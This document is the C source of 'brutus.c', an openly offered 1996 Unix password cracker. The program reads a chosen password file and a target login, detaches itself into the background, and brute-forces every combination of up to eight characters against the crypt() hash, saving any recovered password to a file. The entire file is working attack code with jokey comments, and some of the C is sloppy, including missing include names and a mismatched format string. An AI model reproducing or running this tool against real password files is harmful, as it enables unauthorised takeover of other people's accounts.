/* * * brutus.c (C) 1996 ASS * * some quite brutal way to crack password =) * * This program tests all the possibilities for a unix password * (unix passwords can't be decrypted) * The process might take months (!) before succeeding * - it depends on the speed of the processor - * * Here is the only thing to configure to your needs: * */ #define POSS "&~#\"'{([-|`_\\^@)}]=+$%*?;.,:/!<>9876543210ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsr qponmlkjihgfedcba" /* * * This POSS define contains all the characters to test, * these are the most used ones. * I know that is weird but i count backward, that's why it's reversed :p * (anyway it doesn't change anything if you reverse it huh). * * Feel free to add other weird characters like space,tab, or: * &~#"'{([-|`_\^@)}]=+$%*?;.,:/!<> * BUT keep in mind that each added character slows down the process :( * * * in the future, i might make some multi-processor version heh :D * */ /**************************************************************************** here is the little piece of shit i made (send flames to root@127.0.0.1) ****************************************************************************/ #include #include #include #include #include void main(int argc,char **argv) { char pwn[256]; FILE *pwf; char login[16]; struct passwd *pw; char outn[256]; FILE *outf; pid_t st; char possible[256]; short np; char key[16]; char passwd[16]; short c,d,e,f,g,h,i,j; printf("(C) 1996 ASS\n",argv[0]); printf("password file: "); fgets(pwn,255,stdin); if(pwn[strlen(pwn)-1]=='\n') pwn[strlen(pwn)-1]=0; if((pwf=fopen(pwn,"r"))==NULL) { perror("fopen"); exit(-1); } printf("login to crack: "); fgets(login,15,stdin); if(login[strlen(login)-1]=='\n') login[strlen(login)-1]=0; while((pw=fgetpwent(pwf))!=NULL&&strcmp(pw->pw_name,login)!=0); if(pw==NULL) { printf("login not found in file %s\n",pwn); exit(-1); } fclose(pwf); printf("output file: "); fgets(outn,255,stdin); if(outn[strlen(outn)-1]=='\n') outn[strlen(outn)-1]=0; if((outf=fopen(outn,"w"))==NULL) { perror("fopen"); exit(-1); } fprintf(outf,"*** brutus password cracking (C) 1996 ASS ***\n"); fprintf(outf,"%s:",pw->pw_name); if((st=fork())<0) { perror("fork"); exit(-1); } if(st>0) { printf("process with pid %d running in the background\n",getpid()); exit(0); } setsid(); strcpy(possible,POSS); np=strlen(possible); bzero(key,16); for(c=np;c>=0;c--) { key[7]=possible[c]; for(d=np;d>=0;d--) { key[6]=possible[d]; for(e=np;e>=0;e--) { key[5]=possible[e]; for(f=np;f>=0;f--) { key[4]=possible[f]; for(g=np;g>=0;g--) { key[3]=possible[g]; for(h=np;h>=0;h--) { key[2]=possible[h]; for(i=np;i>=0;i--) { key[1]=possible[i]; for(j=np;j>=0;j--) { key[0]=possible[j]; if(!strcmp(pw->pw_passwd,crypt(key,pw->pw_passwd))) { fprintf(outf,"%s:%d:%d:%s:%s:%s\n",key,pw->pw_uid,pw->pw_gid, pw->pw_gecos,pw->pw_dir,pw->pw_shell); fprintf(outf,"*** the end ***"); fclose(outf); exit(0); } }}}}}}}} fprintf(outf,"NOT FOUND:%d:%d:%s:%s:%s\n",key,pw->pw_uid,pw->pw_gid, pw->pw_gecos,pw->pw_dir,pw->pw_shell); fprintf(outf,"\n*** password more than 8 characters long ***"); fclose(outf); }